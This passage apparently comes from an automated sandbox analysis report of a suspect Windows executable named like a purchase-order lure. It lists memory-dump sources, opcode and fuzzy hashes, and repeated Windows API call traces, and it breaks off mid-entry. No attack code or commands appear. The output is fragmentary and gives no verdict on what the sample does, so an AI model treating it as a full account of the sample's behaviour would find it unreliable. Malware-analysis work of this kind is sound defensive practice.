                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Enable$Show$MessageSend
                • String ID:
                • API String ID: 1871949834-0
                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                APIs
                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                • SendMessageW.USER32 ref: 00471AE3
                • DestroyIcon.USER32(?), ref: 00471AF4
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                • String ID:
                • API String ID: 3611059338-0
                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DestroyWindow$DeleteObject$IconMove
                • String ID:
                • API String ID: 1640429340-0
                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                APIs
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • _wcslen.LIBCMT ref: 004438CD
                • _wcslen.LIBCMT ref: 004438E6
                • _wcstok.LIBCMT ref: 004438F8
                • _wcslen.LIBCMT ref: 0044390C
                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                • _wcstok.LIBCMT ref: 00443931
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                • String ID:
                • API String ID: 3632110297-0
                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteMenuObject$IconWindow
                • String ID:
                • API String ID: 752480666-0
                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                • String ID:
                • API String ID: 3275902921-0
                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                • String ID:
                • API String ID: 3275902921-0
                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                APIs
                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: PerformanceQuery$CounterSleep$Frequency
                • String ID:
                • API String ID: 2833360925-0
                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                APIs
                • SendMessageW.USER32 ref: 004555C7
                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                • String ID:
                • API String ID: 3691411573-0
                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                APIs
                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                • LineTo.GDI32(?,?,?), ref: 004472AC
                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                • LineTo.GDI32(?,?,?), ref: 004472C6
                • EndPath.GDI32(?), ref: 004472D6
                • StrokePath.GDI32(?), ref: 004472E4
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                • String ID:
                • API String ID: 372113273-0
                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                APIs
                • GetDC.USER32(00000000), ref: 0044CC6D
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                APIs
                • __getptd.LIBCMT ref: 0041708E
                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                • __amsg_exit.LIBCMT ref: 004170AE
                • __lock.LIBCMT ref: 004170BE
                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                • _free.LIBCMT ref: 004170EE
                • InterlockedIncrement.KERNEL32(00942DB0), ref: 00417106
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                • String ID:
                • API String ID: 3470314060-0
                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                APIs
                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                • String ID:
                • API String ID: 3495660284-0
                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                APIs
                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Virtual
                • String ID:
                • API String ID: 4278518827-0
                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                • ExitThread.KERNEL32 ref: 004151ED
                • __freefls@4.LIBCMT ref: 00415209
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                • String ID:
                • API String ID: 442100245-0
                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                APIs
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                • _wcslen.LIBCMT ref: 0045F94A
                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
